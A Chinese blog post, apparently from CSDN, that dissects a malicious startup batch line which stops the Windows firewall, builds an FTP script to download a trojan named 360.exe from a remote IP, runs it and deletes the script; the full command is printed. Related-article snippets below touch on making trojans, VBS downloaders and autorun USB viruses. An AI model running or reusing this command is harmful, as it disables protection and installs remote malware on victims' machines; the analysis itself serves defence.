一个木马的自动下载运行批处理命令

最新推荐文章于 2023-02-07 13:30:05 发布
最新推荐文章于 2023-02-07 13:30:05 发布
阅读量5.7k 收藏 2
点赞数
分类专栏: 杂类 文章标签: 360 防火墙 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bill_lee_sh_cn/article/details/6257440
版权

以下这段话被加入了开机启动,自动下载名为360.exe的木马并运行

"c:/windows/system32/cmd.exe" /c net1 stop sharedaccess &echo open 221.13.32.83  > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 360.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&360.exe&360.exe&del cmd.txt /q

大致步骤为:

1.关闭防火墙

2.生成一个cmd.txt文件,作为ftp的命令输入文件,这个文件内容如下:

open 221.13.32.83 
123
123
binary
get 360.exe
bye

3.使用ftp进行下载

4.运行下载的360.exe

 

一头老毅
关注
专栏目录
dos批处理命令详解
海笑天涯
04-08 511
一.简单批处理内部命令简介 1.Echo 命令打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。 语法:echo [{on│off}] [message] Sample:@echo off / echo hello world 在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命 令到特定格式的文
windows 批处理 实现在后台开启自动下载任务
皮皮虾图形学
01-24 962
REM rem关键字为注释的意思 REM 设置变量值 为当前批处理文件所在目录下的external文件夹 set EXT=%~dp0external REM 设置消息回显,%EXT%为引用变量名 echo Installing dependencies into %EXT% REM 如果不存在这个文件夹,就创建这个文件夹。 if not exist %EXT% md %EXT%
cmd 中echo 写入vbs下载木马
ShadowAssassin的专栏
11-30 2242
转:http://www.hackseo.net/post/131.html Sub download(url,target) iLocal=LCase(Wscript.Arguments(1)) iRemote=LCase(Wscript.Arguments(0)) Set xPost=createObject("Microsoft.XMLHTTP") xPost.Open "
模拟木马程序病原体并让木马程序自动运行
02-12 878
模拟黑客修改系统命令,制作病原体,并将病原体脚本放入定时任务、开机自启 生成木马程序病原体 [root@fp-21 ~]# vim /usr/bin/tom # /usr/bin目录下 #!/bin/bash touch /tmp/aaa.txt while : do echo `date` >> /tmp/date.txt # 输出时间 s...
一条命令批量下载文件
颹蕭蕭
09-07 312
curl -O https://web.stanford.edu/class/cs259d/lectures/Session[1-20].pdf
一个适合网管用的万能批处理
12-02
批处理(Batch Processing)是计算机科学中的一种技术,允许用户通过编写一系列命令来一次性执行多条操作,极大地提高了工作效率。 在网管的工作中,可能会涉及到各种任务,如网络设备配置、系统维护、故障排查、...
bat 批处理命令 文件 类型 语法 格式 应用 详解
04-01
### 批处理命令详解 #### 一、批处理基础概念 批处理,即BATCH,是一种在DOS环境下运行的脚本语言应用形式。通过编写一系列的DOS命令,实现特定的功能或完成复杂的任务。批处理文件通常以`.bat`为扩展名。 #### ...
运行命令大全300条
01-29
命令通常与自动化脚本有关,比如在批处理文件中,你可以编写一系列命令来完成特定任务。例如,`for /F`循环命令可读取文件中的每一行并执行相应操作,提高工作效率。 4. **防木马捆绑工具**: 防木马捆绑工具的...
开机自动运行的位置和木马运行方式
http://www.softwareace.cn 王牌软件
04-28 747
1. 把程序或快捷方式放在 C:\Documents and Settings\你的用户名\「开始」菜单\程序\启动\ 2. 注册表位置: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Ru
计算机木马不会主动传播什么疾病,研究如何制作自动运行木马病毒以及如何传播...
weixin_39565021的博客
07-28 785
我一直对Autorun.inf病毒感兴趣. 这个无敌的家伙使防病毒软件无用,因为它等同于用户单击的病毒或木马. 而且这种传播方式是相对隐蔽的. 今天,我将与我自己讨论如何制作这种U盘病毒.Autorun.inf此文件位于硬盘分区的根目录中. 只要双击驱动器号,就会自动运行用Autorun.inf编写的程序,这等效于自动批处理. 想到这种方法的人确实是个天才. 让我们研究一下如何制作此U盘病毒的罪魁...
网页打开后自动执行木马
cqhand的专栏
02-02 1056
lcx run_exe="run_exe+="CODEBASE=/"muma.exe#version=1,1,1,1/">" //这里的muma.exe就是我们要运行的程序 run_exe+="" run_exe+="" run_exe+="等会......网页在下载支持的文件"; //这里是迷惑人的.你可以写其他任何东西. document.open(); document.clear(); d
下载木马到目标机器
08-04 464
本文主要讲述如何将各种木马下载到目标机器,然后进行执行,以便进行下一步的执行。 寻找目录 下载木马到目标主机,首先对应文件夹要有写权限吧,那你想执行得有执行权限吧,所以 icacls directory /t:检查目录地下子目录以及档案的权限 具体可以参考https://dotblogs.com.tw/ghoseliang/2013/03/04/95113 vbs下载木马 VBS是基于Visual Basic的脚本语言。VBS的全称是:Microsoft Visual Basic Script E.
网页木马扫描器(文件批处理工具)
weixin_30929195的博客
03-23 155
用dotnet写了一个小工具,多文件处理工具。Download Demo! Download!!! Source Code 可以清除网页的木马! 可以多文件编码转换 转载于:https://www.cnblogs.com/xingquan/archive/2011/03/23/webscan.html...
BAT批处理脚本自动执行指定路径下程序
gaoduicai的博客
11-10 6114
使用nacos+springboot的微服务架构,每次跑程序前要先启动nacos比较麻烦,然后就写了个简单的批处理,双击直接打开一个cmd执行nacos启动命令
一个 简单的cmd 木马(源代码)
热门推荐
tony的专栏
10-25 4万+
一个 简单的cmd 木马(源代码) // woodtc.cpp : Defines the entry point for the console application.//#include "stdafx.h"#include "WoodSMTP.h"#define BUFFER_SIZE 1024typedef struct{HANDLE hPipe;SOCKET sC
如何利用批文件实现自动从服务器上指定文件夹下载文件到本地指定文件夹
最新发布
weixin_70206159的博客
02-07 1840
双击批文件,自动将腾讯云服务器上的指定文件夹里的文件下载到本地计算机的指定文件夹,如果文件已存在,则覆盖本地文件。
ftp、sftp利用bat脚本自动下载以及上传文件
maimai1993的博客
01-26 2万+
一、ftp利用bat自动上传下载文件  首先,先打开cmd,看下ftp命令是否是开通了的,如果提示ftp不是支持的命令,则需要自己去控制面板-程序以及功能-打开ftp功能。然后就是先自己用cmd命令,进行一次ftp的登入以及get put 文件操作。open 服务器ip  依次输入用户名 密码 ,然后就可以进入到对方服务器的相关目录 ,进行get put操作。 ftp>open 10.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值